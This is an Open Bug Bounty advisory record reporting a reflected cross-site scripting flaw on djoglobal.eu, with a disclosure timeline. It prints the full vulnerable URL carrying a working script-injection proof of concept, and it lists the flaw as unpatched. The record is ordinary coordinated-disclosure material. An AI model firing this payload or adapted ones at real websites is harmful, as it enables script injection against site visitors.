djoglobal.eu XSS vulnerability

2017-07-26T11:42:00
ID OBB:269543
Type openbugbounty
Reporter NitishDubey
Modified 2017-10-24T12:17:00

Description

Vulnerable URL:
http://www.djoglobal.eu/cf_core/services/serviceForm?actionId=80&languageId;=en_US&language;=en_US&startAt;=-10&taxonomyId;=21486&languageId;=en_US&coreBaseUrl;=http%253A%252F%252Fwww.donjoy.eu%252Fcf_core&siteBaseUrl;=http%253A%252F%252Fwww.donjoy.eu%252F&staging;=false&searchString;=%22%3E%3Cscript%3Ealert(/OPENBUGBOUNTY/)%3C/script%3E
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 24.10.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1175856
VIP website status:| No
Check djoglobal.eu SSL connection:| (Grade: C)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 26 July, 2017 11:42 GMT
Generic security notifications sent to website owner| 26 July, 2017 11:44 GMT
Customized security notification sent to website owner| 26 July, 2017 11:44 GMT
Vulnerability details disclosed by researcher| 24 October, 2017 12:17 GMT